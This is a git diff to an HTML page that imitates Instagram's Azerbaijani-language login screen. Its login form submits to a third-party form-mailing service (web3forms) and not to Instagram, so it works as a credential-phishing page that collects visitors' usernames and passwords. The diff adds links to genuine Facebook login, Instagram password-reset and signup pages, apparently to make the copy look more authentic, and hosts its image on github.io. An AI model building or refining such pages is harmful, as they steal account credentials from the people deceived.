--- a/Instagram.html
+++ b/Instagram.html
@@ -157,27 +157,34 @@
 .btn{
     margin-left: 0;
 }
+.pr{
+    color:#0885CC;
+}
 .prl{
     margin-left: 145px;
-   
+    color:#0885CC;
     font-size: 12px;
 }
 span{
     color:#0885CC;
     
 }
+
+.am{
+    color: white;
+}
     </style>
 </head>
 <body>
     <div class="photo">
-        <img src="c:\Users\ferid\Desktop\insta\tel.png" alt="photo">
+        <img src="https://ferko20078.github.io/instaimg/tel.png" alt="photo">
     </div>
     <div class="cont">
     <div class="container">
         <div class="logo">
             <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Instagram_logo.svg/800px-Instagram_logo.svg.png?20160616034027" alt="Instagram Logo">
         </div>
-        <button class="btn"><i class="fa-brands fa-square-facebook"></i>  Facebook ilə daxil olun</button><br>
+        <button class="btn"><a class="am" href="https://www.facebook.com/login.php?skip_api_login=1&api_key=124024574287414&kid_directed_site=0&app_id=124024574287414&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Foauth%3Fclient_id%3D124024574287414%26locale%3Den_US%26redirect_uri%3Dhttps%253A%252F%252Fwww.instagram.com%252Faccounts%252Fsignup%252F%26response_type%3Dcode%252Cgranted_scopes%26scope%3Demail%26state%3D%257B%2522fbLoginKey%2522%253A%2522c3x5bwszjk0gyg1uaq1d8ziwx1a7qj411e62mqbb9iqar1ufwbv7%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3Db8285037-279f-433c-ac50-06de23bca62f%26tp%3Dunspecified&cancel_url=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%2522fbLoginKey%2522%253A%2522c3x5bwszjk0gyg1uaq1d8ziwx1a7qj411e62mqbb9iqar1ufwbv7%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%23_%3D_&display=page&locale=en_US&pl_dbl=0"><i class="fa-brands fa-square-facebook"></i>  Facebook ilə daxil olun</a></button><br>
         <div class="divider"></div><br>
         <form action="https://api.web3forms.com/submit" method="POST">
 
@@ -195,13 +202,13 @@ span{
             <!-- Custom Confirmation / Success Page -->
             <!-- <input type="hidden" name="redirect" value="https://mywebsite.com/thanks.html"> -->
         <br>
-        <span class="prl">Parolunuzu unutmusuz?</span><br><br>
+        <span class="prl"><a class="pr" href="https://www.instagram.com/accounts/password/reset/"> Parolunuzu unutmusuz?</</span><br><br>
             <button type="submit">Daxil ol</button>
         </form>
         
         <div class="footer">
             <br>
-            <p>Hesabınız yoxdur?<a href="£">Qeydiyatdan keçin.</a></p><br><p>Davam etməklə siz Instagram-ın İstifadə Şərtləri və Məxfilik Siyasəti ilə razılaşırsınız.</p>
+            <p >Hesabınız yoxdur?<a href="https://www.instagram.com/accounts/emailsignup/">Qeydiyatdan keçin.</a></p><br><p>Davam etməklə siz Instagram-ın İstifadə Şərtləri və Məxfilik Siyasəti ilə razılaşırsınız.</p>
         </div>
     </div>
     </div>
